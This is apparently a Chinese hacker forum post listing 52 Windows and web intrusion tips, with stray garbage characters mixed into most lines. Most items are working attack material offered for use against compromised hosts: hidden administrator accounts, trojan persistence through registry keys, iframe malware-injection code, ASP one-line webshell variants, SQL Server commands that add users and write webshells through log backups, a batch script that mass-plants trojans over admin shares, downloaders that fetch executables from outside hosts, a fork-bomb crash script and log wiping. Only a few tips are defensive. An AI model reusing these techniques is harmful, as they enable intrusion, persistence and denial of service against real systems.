1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,* K) l* |5 |# U/ r& J- x6 g
cacls C:\windows\system32 /G hqw20:R
7 Y( U1 ?7 q) _2 K# k" U思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
& ?# f3 p/ M4 k, M恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F* _7 R& E1 Y: n, Z$ L( V
5 M" G2 l9 o, m) q. c/ e) t0 p: D2 }( g2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ R5 _+ n+ R8 T0 ~, R1 Y8 `- z, u: `' W# w8 c
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
2 G. Z6 z0 M- n% H- s2 N( t5 i0 a! j
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号0 @( l$ D0 p4 [
4 A% R3 H6 N* Q, @" d x G0 ]: M, v0 f5、利用INF文件来修改注册表+ q% z& |! V7 j/ L" f" u* ?
[Version]
9 W" S% A% L9 v$ j" tSignature="$CHICAGO$"% ^$ j: J% J% F4 G9 y( K7 [% G
[Defaultinstall]
5 V3 @ w# ^$ O8 L" L* E1 f0 q5 LaddREG=Ating5 `# _, U0 j6 l( | E3 C- L
[Ating]6 s9 c! U/ @8 [5 b$ S$ G
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
) Z C/ Z7 Q( p) V* h( [2 V以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
6 K j ^ @# }8 V3 H% S& orundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
9 n( b7 e4 r ?8 h2 j1 X1 d: o- n其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU5 l% ^ W4 P6 m' G# n
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% ^0 O& Q! H, E5 X* ^HKEY_CURRENT_CONFIG 简写为 HKCC1 ~# J/ @9 p2 k/ t8 H
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值) l9 H. [& \) c8 L
"1"这里代表是写入或删除注册表键值中的具体数据2 x3 m% u3 g: a' s5 C
! V) I- D1 O. _ k v6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,- P5 |' q+ ^; @3 ~* j" ]# C5 R2 O
多了一步就是在防火墙里添加个端口,然后导出其键值2 h# K4 T- A" Z5 j' D. R
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]5 O# G; s6 f9 {
. b" l: I7 z) `$ ^2 j
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽2 }% @. ?$ u( c" y" `1 v
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。" G2 F" T* U/ x4 o+ ]: I
: C. M7 d( A3 _9 k; u2 U- F8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。, Y: ~ v, U. g
$ ]+ J' P& I5 _! ^; d a% [9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,, s0 Z E7 F; T& D) i `
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。! s2 j6 W3 v2 \8 L
% I- ]* k# X) O+ A) x. [& [! d6 T8 g
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”6 J1 V2 f/ y& i$ G1 ^" g
" n# c! c1 w5 J, A11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,& J$ {0 @5 M5 ]" w
用法:xsniff –pass –hide –log pass.txt, {0 m4 M& r/ U/ n) l! s
7 b4 V! }0 t; w; H9 ~$ H
12、google搜索的艺术
& I4 ~2 D6 G5 ~! p0 T e搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”# Q- X6 F( w' O, Q% c7 B0 y+ Y
或“字符串的语法错误”可以找到很多sql注入漏洞。, D4 d' F* x: c% ]) c7 G+ \$ H. O
- S8 ~. z/ I; |6 b G- d, v( j1 G13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
5 y# p+ K* y3 y3 a8 f. q# }5 w
/ D9 r8 N* M- ^; Z1 Q' `$ }2 ]14、cmd中输入 nc –vv –l –p 1987$ C+ \* T5 [1 c [5 V$ k& k) t( N
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
3 M# x: ~: l8 n$ n* }* B# D$ j8 `
9 j( F5 E1 T, V$ d8 n15、制作T++木马,先写个ating.hta文件,内容为5 e/ Z: m+ ?8 d6 }$ d
<script language="VBScript">
9 ^) i. n" U/ ?( J$ M9 s- \: `+ E0 yset wshshell=createobject ("wscript.shell" )0 l2 }! v% h8 W0 o
a=wshshell.run("你马的名称",1)
& ?0 ~% i$ J7 a: w/ C1 H! r0 O% p% {window.close" T: R) ]4 v) j- @; a+ R
</script>
) P1 R. X+ |( B: F+ m$ g5 B* _1 F再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
6 c& _2 h+ X$ Z6 |8 C# ]. z9 Q' |4 ]1 c/ Q
16、搜索栏里输入" z+ A! R" Y% H1 ?
关键字%'and 1=1 and '%'='
. t: ~1 N: q& z6 w# n关键字%'and 1=2 and '%'='3 r+ _9 `5 W! D6 N
比较不同处 可以作为注入的特征字符
4 O. f$ y, F- Z2 ~; I6 s- ]" @# t$ \' j
17、挂马代码<html>
( N- E. ~* S4 X+ ^3 I<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 q; B7 ?/ x- ? o% N/ X! O
</html>
. w, |/ `7 |& X \; b4 z
8 L3 C2 B8 L( D' S8 N18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,$ n8 M7 a. ^& d% ~. n E8 k7 H
net localgroup administrators还是可以看出Guest是管理员来。
- g7 I; ?( Y: Z" X- H- @, q
, i6 C, {, ?5 r0 M& ?19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( z W3 N) n. J用法: 安装: instsrv.exe 服务名称 路径 z: n/ z2 u- J1 I" d6 L
卸载: instsrv.exe 服务名称 REMOVE
- N8 n t9 [+ H$ R- m
9 [% C6 E& K4 o5 {0 e- \1 S$ _+ V- X+ s6 C) g! T1 {' {
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉, j! X- L; j; F; W; W9 ]7 c
不能注入时要第一时间想到%5c暴库。
2 V) F4 H4 L! \( N/ X1 ~
. w5 [+ M. U& F3 G22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~" b7 \" [% c/ U J0 g' ~: F
9 j" {. W; J, F! Y
23、缺少xp_cmdshell时9 t0 m8 T+ G2 ]0 ~6 m. v8 {% y
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' @. O: J% B& s% D假如恢复不成功,可以尝试直接加用户(针对开3389的)" j# Q0 E/ I* r# A; R
declare @o int
4 v( A; D, X, a: Rexec sp_oacreate 'wscript.shell',@o out
) k- `' X0 t ?3 L# s- Jexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
- D' y2 D4 \5 I! R9 A
0 V( I5 g' T ~0 t0 Q' H% ]24.批量种植木马.bat, s* I% m/ W) r; B0 V5 J$ W L
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 M7 y D, Q/ Vfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
4 p( v5 y3 j3 g J) _7 o( @) a扫描地址.txt里每个主机名一行 用\\开头
* s. X/ w6 t; ]5 |1 X3 I8 V7 c& t# J# W8 n, V7 w7 R
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 B: \8 h0 |! J9 {/ K) T1 x, ?1 m: L. y) W4 [: N( g: m* }
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.7 `% a2 `( f% d3 X% C4 A) y% c7 G# c
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.2 T% Q M) C N, ^0 ^
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
) ?0 h1 h# E' E2 K" h
8 f6 q- u" ]# N H+ G6 K27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP& z8 a- \# J2 K. ^) P+ ?5 [
然后用#clear logg和#clear line vty *删除日志1 L/ I" T# k2 E5 i3 q* E6 c0 S
) j, ^& |6 A% F. S) m
28、电脑坏了省去重新安装系统的方法
4 q& x* O6 D* b3 P纯dos下执行,
% c. R& P% v' R8 j3 b; [' R! j; mxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' i# z1 w7 s8 p+ [: s" P/ c) m
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
' @/ p- P% t- K c' O* c* Q3 i! g* s
29、解决TCP/IP筛选 在注册表里有三处,分别是:
! S m6 l1 V) S" c* N zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
2 u( p! J& E/ L% j! ?: n1 g6 UHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% v) _: Q, ~0 r9 X. T) ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! N6 ~. S5 t1 Z" h
分别用
, L. W( T2 P; `regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 R" l5 j+ J! w9 ^regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
2 j. f. r4 i1 w* i( \' ^regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip: D) t/ ~* H1 K! q- {- P
命令来导出注册表项% I! k! y. s8 Z/ Q6 V
然后把三个文件里的EnableSecurityFilters"=dword:00000001,' t. \: ~8 p, e: r6 Z: x
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用! k5 o7 i. }3 W
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& t2 Q. [2 z/ l0 l
7 {6 t. x+ Q) F) G30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* q0 f5 H" ?) w# T8 c4 Z' MSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3: F, b, w& c- Z/ a/ o# i
& f/ Z. ?$ B& m' u" L3 P- K- z2 f31、全手工打造开3389工具
1 m: c- d; r0 k+ e, v9 `. b打开记事本,编辑内容如下:
1 j. F! g4 N ?echo [Components] > c:\sql0 J8 `/ E# r7 Y% E
echo TSEnable = on >> c:\sql
% W" o6 w& P! Hsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q# G% L: A% K+ k! T* S. r+ P/ V
编辑好后存为BAT文件,上传至肉鸡,执行" F; h) e, h. c9 w# d3 Z( [: b
4 `8 }& Y' @0 H0 D% V32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马 Q; m. Y" `" d* b" O
A$ V( w' m G33、让服务器重启% _, @% z6 W" `; @
写个bat死循环:* ?7 }+ o/ P% Y* o% S' w
@echo off
' e- K/ S7 y G d. U0 R:loop1) F6 H3 k Q( S p
cls
9 \/ {1 y* u, u- c. l" F' dstart cmd.exe
. s8 }* X# ^9 E7 ^. z8 R$ ^goto loop14 Y5 p9 P# r$ S
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启5 h* }# Y6 F7 M7 \ z! e& [
5 j1 C4 \' M1 [- A6 Y6 }7 e
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
" H6 w8 H$ V: O: R@echo off
' w t7 O. ~$ [7 y( Ddate /t >c:/3389.txt& N$ H/ A; q/ w2 y# y
time /t >>c:/3389.txt$ n6 M& {( ~+ E/ s3 h% ~1 ^/ f2 m; `" N
attrib +s +h c:/3389.bat6 l% e. Y$ O& a- X7 s9 p- t# W& e
attrib +s +h c:/3389.txt
) f9 Q3 ~4 ]4 ?* M0 bnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& |+ G$ Y6 Q3 e& m4 b8 b并保存为3389.bat9 z! v% t4 Z+ P* h
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
S( e9 s0 A$ _
5 j1 `! |& J( B35、有时候提不了权限的话,试试这个命令,在命令行里输入:+ Y4 S* j* \8 t. Y/ M, ]
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
9 O7 T! Q& {. D* `5 j2 @输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
n; u% K9 z- p, S* W) V+ D4 W3 |) Y0 Q/ X Q W
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件) g+ G: c4 d3 `- N8 A
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址( j. r8 b+ o# n3 `% \& L& }7 R
echo 你的FTP账号 >>c:\1.bat //输入账号
* V/ u$ n4 ?4 Y# n! |echo 你的FTP密码 >>c:\1.bat //输入密码
) J( S; l# w# iecho bin >>c:\1.bat //登入
. X' y' p0 T0 C" `8 A/ L) |echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
: s$ g- S m& Iecho bye >>c:\1.bat //退出 y/ ?# o9 v2 j! ^ X: U
然后执行ftp -s:c:\1.bat即可
0 V) x, {0 n; c- w6 n. _" i Y- r' l' \, E
37、修改注册表开3389两法
$ h# j7 @& v: a, P7 O(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
" y8 p) d+ b8 I/ _ N: y2 eecho Windows Registry Editor Version 5.00 >>3389.reg" M+ v/ m) n* Q5 V
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
2 p% U! M! M i7 e0 N5 xecho "Enabled"="0" >>3389.reg
8 S8 m- I4 V% A" p4 O0 S Wecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
7 p9 ~# g7 q! `7 N, m5 ^NT\CurrentVersion\Winlogon] >>3389.reg% A' x' g( e! N6 M, R d
echo "ShutdownWithoutLogon"="0" >>3389.reg
3 V* y' k6 W4 Q: R6 ~9 P. Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 N# b' n1 `! l r6 Z; V( t- ~
>>3389.reg7 e8 g. R& S: w7 K: ]3 V. N
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg$ `1 c" A: R1 h, l, D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
+ ]4 h E; W3 g>>3389.reg# }9 [8 L3 o; K- ^; z& @) i8 R+ F
echo "TSEnabled"=dword:00000001 >>3389.reg# {. q$ K4 L$ [9 P& P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
. A6 D2 o9 q7 l3 Y) ~echo "Start"=dword:00000002 >>3389.reg5 {+ V2 W3 T. u7 w! t7 b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]0 s: t: S( m$ [6 S) e) ]* N; d; y
>>3389.reg6 `) L( i5 B$ Q1 ^
echo "Start"=dword:00000002 >>3389.reg# `! m0 a9 e7 D
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. `0 X+ w3 i+ N4 L Necho "Hotkey"="1" >>3389.reg
" A% v) X5 X" G- G9 M3 |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! F0 { I3 N9 S, {
Server\Wds\rdpwd\Tds\tcp] >>3389.reg- k! L# ~# v+ Z1 P" N- ~% F
echo "PortNumber"=dword:00000D3D >>3389.reg. w8 s( T, ?! l8 g* @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% ?, d* S, \! |0 _" p7 f Q( xServer\WinStations\RDP-Tcp] >>3389.reg& [# M8 J+ s' Z5 j3 o( A
echo "PortNumber"=dword:00000D3D >>3389.reg1 G( k4 M |8 n
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ q7 e; a0 Z) P+ h4 x(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, u. j- e" L+ c( U因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 E1 Z: y, w8 q(2)winxp和win2003终端开启
9 g9 a- J* G' k1 y8 k用以下ECHO代码写一个REG文件:
) g \# r$ Y5 Z* Decho Windows Registry Editor Version 5.00>>3389.reg
9 @- D. O* W1 N+ W" i" U( c4 `0 `echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 t) Z2 k4 x0 E( }
Server]>>3389.reg" a9 ]1 \ J5 Z0 H/ |) k
echo "fDenyTSConnections"=dword:00000000>>3389.reg
V, D* C5 G4 N! E8 @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# L4 K" u: y: L3 j, p' RServer\Wds\rdpwd\Tds\tcp]>>3389.reg8 \; N0 S# z) b6 o0 B$ [5 x
echo "PortNumber"=dword:00000d3d>>3389.reg
1 J7 [" `6 p) Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 t- V% \9 p6 v' [! L& V5 CServer\WinStations\RDP-Tcp]>>3389.reg ]' M1 ?3 n/ s2 t( S5 [
echo "PortNumber"=dword:00000d3d>>3389.reg
% d) a% Q9 J+ Z# H) U' N: g$ L然后regedit /s 3389.reg del 3389.reg
5 p: f- u- R) _7 `+ MXP下不论开终端还是改终端端口都不需重启
9 y0 a, @ y( l# y1 h6 A& A0 z A: T0 w6 d1 F5 V
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃$ M/ V* V$ h5 g* M) q1 _ x# D5 d
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
) a) w9 Z( i; U% d# W" \, @7 y$ O' K$ U
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
" J0 K. p' _) ?(1)数据库文件名应复杂并要有特殊字符( `$ m' j) o2 ^' ~' s
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源8 r% U: ?& v" Z8 Y& _9 b) m2 h) z
将conn.asp文档中的0 z+ Y2 H& I6 y' L% x2 M
DBPath = Server.MapPath("数据库.mdb")) h8 u8 T2 t. t
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: y! @, w4 f, p& Q* z8 a0 O0 K1 j" [
}7 p9 z) k9 F% ^$ u修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
6 @% I+ `4 l# w0 D" F: N(3)不放在WEB目录里
7 F6 x3 p, g7 @3 @6 ]/ n
% z! i7 h& x9 o3 [- U& y. U2 y7 D40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
9 o0 [# m) L ^3 k2 r0 U2 n1 B' x可以写两个bat文件/ D! A3 @" ]' G! i4 i
@echo off
) @$ B- J+ F& ]' S/ b+ N@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe( j5 U+ H# r( M% y- S1 F
@del c:\winnt\system32\query.exe
/ E5 ^2 ^3 S8 c@del %SYSTEMROOT%\system32\dllcache\query.exe! T, V- y' T, a, R
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的) B1 {7 u: W6 e" L) b8 a
: U z, d. K1 c+ T
@echo off
( x0 w3 a) O+ y. g' |0 U3 n+ x# O# d@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
W- ^/ Q) f, c3 t! h, \" s, @@del c:\winnt\system32\tsadmin.exe
/ \; q* T4 z! B# |) q, O@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
, l8 J/ p% g) F. O2 y" f' m) y/ Z6 f
41、映射对方盘符; V! j( D+ a4 o& r! P6 \% j/ }
telnet到他的机器上,
d3 z7 b! c, ?# O* {net share 查看有没有默认共享 如果没有,那么就接着运行, T$ E) U. c- W( p% s4 @
net share c$=c:
: x3 }. q: f# R$ C1 \# `9 tnet share现在有c$
+ V. ~* O: T* H' s% s4 `在自己的机器上运行
0 g8 W( `- h/ e3 S: ]net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K( j+ L7 w7 q W* v* C
8 i3 S6 H }* L |7 W42、一些很有用的老知识
# d- x! I- C# f( \: R3 Jtype c:\boot.ini ( 查看系统版本 )3 u/ [' C/ c$ b' g' @2 B
net start (查看已经启动的服务)
! _5 Q: q& i) o7 \+ h/ K% V9 c$ h2 B7 r, kquery user ( 查看当前终端连接 )1 h8 v- s- l4 _- V
net user ( 查看当前用户 )
, ]6 `" A5 O% Z& {net user 用户 密码/add ( 建立账号 )
$ x' I3 o( q; ^% F8 ]" T5 Fnet localgroup administrators 用户 /add (提升某用户为管理员)5 b, N/ L% ]3 I# e/ d; D
ipconfig -all ( 查看IP什么的 )- ]5 ~: e5 K S' [# w
netstat -an ( 查看当前网络状态 )
- U6 o" J: v. n$ J: F+ sfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
3 o; \* ?, T* f) O+ Z克隆时Administrator对应1F4+ D! q9 d/ z) K( a
guest对应1F5 j8 }' `. U- J- I& W4 _
tsinternetuser对应3E8
* c7 k9 G& H5 ] |8 c! R; I2 K. N% j) ~- T8 c, o9 M3 y2 X. }" ?! }
43、如果对方没开3389,但是装了Remote Administrator Service
@, J5 X* K0 g \, ?' U7 D用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接/ [# P5 x2 q3 \. z+ T; s
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息& X3 Q! a3 t7 d8 e% s8 u
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
9 w0 |, \$ s$ n+ M1 x
6 h8 P' ?2 N. |! d% s0 m5 }6 }5 d7 ?44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
: E9 U9 [4 u% L. r1 G" e1 i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
* i/ p6 O3 F, C4 X9 R' }( K! Z" H" Y" l7 ?- o2 e: W2 Q4 K
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)* f/ f* b. [/ k: T" S% E2 G% C
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
) o M. ^7 i( M/ ?^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =* C. U; S. x& T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =6 z+ E# `+ R% G6 B
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs: K% @+ E! a4 G; |
(这是完整的一句话,其中没有换行符)4 ~1 H7 g+ A1 R! R
然后下载:' J3 |; u' P% a. d4 B
cscript down.vbs http://www.hack520.org/hack.exe hack.exe9 `1 G5 A2 i) y% d
$ W: S9 ?" w3 w" U+ ]# M4 o46、一句话木马成功依赖于两个条件:
- b- W7 d, m8 F" |1、服务端没有禁止adodb.Stream或FSO组件3 S& U) I8 H( [! c3 X W
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 p3 S! l9 S. u
/ I. {. q C1 W47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' F, D% \0 F9 ]9 Y8 h; Y) d;alter database utsz set RECOVERY FULL--1 D2 j& v! h! B7 Z& l, j
;create table cmd (a image)--
6 J% U& |; P @& T. t;backup log utsz to disk = 'D:\cmd' with init--2 G7 n9 `* J' Z2 q' d' S
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--1 Y2 d% Z' r& \
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
5 m g/ r. Z; k- l3 C注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
2 F0 F. Y" M+ S) @4 v
* D, m# k8 }6 f7 Z48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" F% y i# X* y2 V. Z1 P {2 B- W7 r8 a# h
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
D/ S8 s. ? V$ m所有会话用 'all'。
$ [4 }8 }0 s y, U2 Z" J8 M-s sessionid 列出会话的信息。
. X. P# w: V: {! k3 s" l j-k sessionid 终止会话。- a3 @0 Y7 D# H! D. g
-m sessionid 发送消息到会话。% J' G7 E% J" K
$ J( n v+ D, B6 ^: |
config 配置 telnet 服务器参数。' V6 Z# [3 N2 B( B$ b; q8 D$ V
: o) s% s4 {: e5 X: h* n) Gcommon_options 为:( O( x2 j2 |5 P* O
-u user 指定要使用其凭据的用户. K- r' i' M) m
-p password 用户密码4 v' X: m! W# K+ I" ~
8 I% t0 i5 N* C" X4 g
config_options 为:
3 Q& T/ n8 T) Z- u9 }dom = domain 设定用户的默认域* r2 D: Z. d5 g: A$ E2 ]! m5 A2 S M
ctrlakeymap = yes|no 设定 ALT 键的映射
) R9 ]& O8 C5 S) I" r# M& Itimeout = hh:mm:ss 设定空闲会话超时值
9 G. {9 u+ {( z$ ~2 ytimeoutactive = yes|no 启用空闲会话。( M9 l9 o) \; _4 e) A9 {
maxfail = attempts 设定断开前失败的登录企图数。6 J% k* p) P7 } f2 q1 K
maxconn = connections 设定最大连接数。
8 ~# N e3 V8 A7 ]+ B: c5 g! Bport = number 设定 telnet 端口。
. ^- Z% J2 e) `; bsec = [+/-]NTLM [+/-]passwd) k0 }+ U- \+ z6 F2 V- G9 k
设定身份验证机构
2 q: d* G0 p' ] ?/ C9 t0 Ifname = file 指定审计文件名。
# Y4 G' {* b3 ~- {4 Hfsize = size 指定审计文件的最大尺寸(MB)。
% R7 C& m( Y2 S0 k m1 vmode = console|stream 指定操作模式。9 H! E4 U+ H/ G! n
auditlocation = eventlog|file|both
0 b2 s) U0 I7 w8 X4 @指定记录地点
& d% n, k5 e- c1 ?2 Raudit = [+/-]user [+/-]fail [+/-]admin. Q0 Z' m8 {: P+ D/ \$ q1 w
`+ _2 o' g$ g- O/ C% F( a49、例如:在IE上访问:/ ?6 M! G- o2 {# D( `7 H# ^
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
1 i7 i4 [5 ?9 A. Dhack.txt里面的代码是:% Z$ t8 f: J+ c* m3 q3 ^9 B3 w" `
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
p9 x- {8 ~. G; u' o A- Y& a把这个hack.txt发到你空间就可以了!
( G/ i5 p9 M! G: X- Z4 P* o这个可以利用来做网马哦!
L2 d! q* y8 c
4 v1 i5 B9 H+ P; H& ]8 B50、autorun的病毒可以通过手动限制!; u U2 `1 s h( o2 F
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!6 z/ L A# I7 \ \5 s
2,打开盘符用右键打开!切忌双击盘符~ ~ t" Q" L- @5 q3 W
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
$ b& V) }2 r$ h$ v( R, ^ Y" C3 U) T2 x1 U
51、log备份时的一句话木马:
3 b; A! I2 p7 ?1 Y* ?a).<%%25Execute(request("go"))%%25>$ _, m8 |* w* x3 w" l
b).<%Execute(request("go"))%>
8 K* L0 c9 y! ?2 B" [2 Lc).%><%execute request("go")%><%: S1 S; Q: Z+ S5 Y
d).<script language=VBScript runat=server>execute request("sb")</Script>7 G2 k+ l+ e3 t: y# l
e).<%25Execute(request("l"))%25>
0 m6 b4 x2 R. t* af).<%if request("cmd")<>"" then execute request("pass")%>+ m7 U% ?- ^! Z; g9 Y
, L! F+ D8 I1 Y- T# ~+ S' g/ ]52、at "12:17" /interactive cmd: x) Y( @8 z$ v- P, J7 N% W9 _' ?- F
执行后可以用AT命令查看新加的任务
